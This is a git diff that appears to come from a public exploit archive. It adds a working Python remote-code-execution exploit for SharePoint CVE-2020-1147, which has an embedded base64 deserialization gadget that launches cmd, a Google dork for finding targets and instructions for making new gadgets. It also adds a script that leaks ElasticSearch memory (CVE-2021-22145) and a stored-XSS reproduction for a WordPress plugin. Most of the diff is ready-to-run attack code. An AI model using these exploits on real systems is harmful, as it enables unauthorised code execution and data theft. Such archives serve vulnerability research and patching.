diff --git a/exploits/aspx/webapps/48747.py b/exploits/aspx/webapps/48747.py
index b1225b54a..8686e3e1c 100755
--- a/exploits/aspx/webapps/48747.py
+++ b/exploits/aspx/webapps/48747.py
@@ -244,11 +244,4 @@ result.headers['MicrosoftSharePointTeamServices'])
stdout.write('Response: %d\n' % result.status_code)
except Exception as error:
- stderr.write('error in main %s' % str(error))
-
-
-Regards,
-
-West Shepherd
-OSWE | OSCE | OSCP | OSWP | CEH | Security+
-West Lee Shepherd, LLC
\ No newline at end of file
+ stderr.write('error in main %s' % str(error))
\ No newline at end of file
diff --git a/exploits/aspx/webapps/50151.py b/exploits/aspx/webapps/50151.py
new file mode 100755
index 000000000..31866d86d
--- /dev/null
+++ b/exploits/aspx/webapps/50151.py
@@ -0,0 +1,221 @@
+# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
+# Google Dork: inurl:quicklinks.aspx
+# Date: 2020-08-14
+# Exploit Author: West Shepherd
+# Vendor Homepage: https://www.microsoft.com
+# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
+# Pack 2, SharePoint Server 2019
+# Tested on: Windows 2016
+# CVE : CVE-2020-1147
+# Credit goes to Steven Seele and Soroush Dalili
+# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
+
+#!/usr/bin/python
+from sys import argv, exit, stdout, stderr
+import argparse
+import requests
+from bs4 import BeautifulSoup
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from requests_ntlm import HttpNtlmAuth
+from urllib import quote, unquote
+import logging
+
+
+class Exploit(object):
+ # To generate the gadget use:
+ # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
+ # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
+ gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='
+ control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
+ control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
+ control_path = control_path_quicklinks
+
+ def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''):
+ requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+ self.username = '%s\\%s' % (domain, username)
+ self.target = target
+ self.password = password
+ self.session = requests.session()
+ self.redirect = redirect
+ self.timeout = 0.5
+ self.proxies = {
+ 'http': 'http://%s' % proxy_address,
+ 'https': 'http://%s' % proxy_address
+ } \
+ if proxy_address is not None \
+ and proxy_address != '' else {}
+ self.headers = {}
+ self.query_params = {
+ 'Mode': "Suggestion"
+ }
+ self.form_values = {
+ '__viewstate': '',
+ '__SUGGESTIONSCACHE__': ''
+ }
+ self.cookies = {}
+ self.payload = """\
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Deserialize
+
+ {GADGET}
+
+
+
+
+
+
+
+""".replace('{GADGET}', self.gadget)
+
+ def do_get(self, url, params=None, data=None):
+ return self.session.get(
+ url=url,
+ verify=False,
+ allow_redirects=self.redirect,
+ headers=self.headers,
+ cookies=self.cookies,
+ proxies=self.proxies,
+ data=data,
+ params=params,
+ auth=HttpNtlmAuth(self.username, self.password)
+ )
+
+ def do_post(self, url, data=None, params=None):
+ return self.session.post(
+ url=url,
+ data=data,
+ verify=False,
+ allow_redirects=self.redirect,
+ headers=self.headers,
+ cookies=self.cookies,
+ proxies=self.proxies,
+ params=params,
+ auth=HttpNtlmAuth(self.username, self.password)
+ )
+
+ def parse_page(self, content):
+ soup = BeautifulSoup(content, 'lxml')
+ for key, val in self.form_values.iteritems():
+ try:
+ for tag in soup.select('input[name=%s]' % key):
+ try:
+ self.form_values[key] = tag['value']
+ except Exception as error:
+ stderr.write('error for key %s error %s\n' % (key, str(error)))
+ except Exception as error:
+ stderr.write('error for selector %s error %s\n' % (key, str(error)))
+ return self
+
+ def debug(self):
+ try:
+ import http.client as http_client
+ except ImportError:
+ import httplib as http_client
+ http_client.HTTPConnection.debuglevel = 1
+ logging.basicConfig()
+ logging.getLogger().setLevel(logging.DEBUG)
+ requests_log = logging.getLogger("requests.packages.urllib3")
+ requests_log.setLevel(logging.DEBUG)
+ requests_log.propagate = True
+ return self
+
+ def clean(self, payload):
+ payload = payload.replace('\n', '').replace('\r', '')
+ while ' ' in payload:
+ payload = payload.replace(' ', ' ')
+ return payload
+
+ def get_form(self):
+ url = '%s%s' % (self.target, self.control_path)
+ resp = self.do_get(url=url, params=self.query_params)
+ self.parse_page(content=resp.content)
+ return resp
+
+ def send_payload(self):
+ url = '%s%s' % (self.target, self.control_path)
+ # self.get_form()
+ self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
+ self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
+ self.form_values['__viewstate'] = ''
+ resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
+ return resp
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
+ try:
+ parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ')
+ parser.add_argument("-username", action='store', default='', help='Username to use: first.last')
+ parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local')
+ parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020')
+ parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
+ parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False')
+ parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080')
+
+ if len(argv) == 1:
+ parser.print_help()
+ exit(1)
+ options = parser.parse_args()
+
+ exp = Exploit(
+ proxy_address=options.proxy,
+ username=options.username,
+ domain=options.domain,
+ password=options.password,
+ target=options.target
+ )
+
+ if options.debug:
+ exp.debug()
+ stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
+ options.target, options.username, options.domain, options.password, options.debug, options.proxy
+ ))
+
+ result = exp.send_payload()
+ stdout.write('Response: %d\n' % result.status_code)
+ if 'MicrosoftSharePointTeamServices' in result.headers:
+ stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])
+ if options.both and result.status_code != 200:
+ exp.control_path = exp.control_path_quicklinksdialogform
+ stdout.write('Trying alternate page\n')
+ result = exp.send_payload()
+ stdout.write('Response: %d\n' % result.status_code)
+
+ except Exception as error:
+ stderr.write('error in main %s' % str(error))
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50149.py b/exploits/multiple/webapps/50149.py
new file mode 100755
index 000000000..40b726cb1
--- /dev/null
+++ b/exploits/multiple/webapps/50149.py
@@ -0,0 +1,70 @@
+# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure
+# Date: 21/07/2021
+# Exploit Author: r0ny
+# Vendor Homepage: https://www.elastic.co/
+# Software Link: https://github.com/elastic/elasticsearch
+# Version: 7.10.0 to 7.13.3
+# Tested on: Kali Linux
+# CVE : CVE-2021-22145
+
+#/usr/bin/python3
+
+from argparse import ArgumentParser
+import requests
+from packaging import version
+import json
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print("\n################################################################################################")
+print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######")
+print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######")
+print("################################################################################################\n")
+parser = ArgumentParser()
+parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
+parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
+parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
+args = parser.parse_args()
+
+if not (args.url):
+ parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"')
+
+#Prepare authentication header
+authorization_header = ""
+if(args.api_key or args.basic):
+ authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic
+
+#Check elasticsearch version
+r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False)
+try:
+ es_version = json.loads(r.content)["version"]["number"]
+except:
+ print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
+ print("# Server response: " + str(r.content))
+ exit()
+
+if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"):
+ print("# Elastic Service not vulnerable")
+ print("# Elastic Service version: " + es_version)
+ print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3")
+ exit()
+
+#Prepare exploitation
+payload = "@\n"
+vulnerable_endpoint = "/_bulk"
+url = args.url + vulnerable_endpoint
+
+#Exploitation
+print("# ElasticSearch Version: " + es_version)
+print("# Request to " + url+"\n")
+r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False)
+
+#Read Memory Leak and remove stacktrace
+
+print("$$$$$$$$$$$$$$$$$$$$$$$$$")
+print("$$$$$ Memory Leaked $$$$$")
+print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
+response = json.loads(r.content)
+leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0]
+leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0]
+print(leak1+"\n"+leak2)
\ No newline at end of file
diff --git a/exploits/php/webapps/50150.txt b/exploits/php/webapps/50150.txt
new file mode 100644
index 000000000..73537423b
--- /dev/null
+++ b/exploits/php/webapps/50150.txt
@@ -0,0 +1,16 @@
+# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)
+# Date: 23/07/2021
+# Exploit Author: Vikas Srivastava
+# Software Link: https://wordpress.org/plugins/simple-post/
+# Version: 1.1
+# Category: Web Application
+# Tested on Mac
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.7.2
+2. Install and activate Simple Post
+3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field.
+4. Click Update Options.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: ">
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 747571771..1f15571b6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44282,3 +44282,6 @@ id,file,description,date,author,type,platform,port
50146,exploits/hardware/webapps/50146.txt,"KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass",2021-07-21,LiquidWorm,webapps,hardware,
50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",2021-07-21,LiquidWorm,webapps,hardware,
50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",2021-07-21,faisalfs10x,webapps,php,
+50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",2021-07-23,r0ny,webapps,multiple,
+50150,exploits/php/webapps/50150.txt,"WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)",2021-07-23,"Vikas Srivastava",webapps,php,
+50151,exploits/aspx/webapps/50151.py,"Microsoft SharePoint Server 2019 - Remote Code Execution (2)",2021-07-23,Podalirius,webapps,aspx,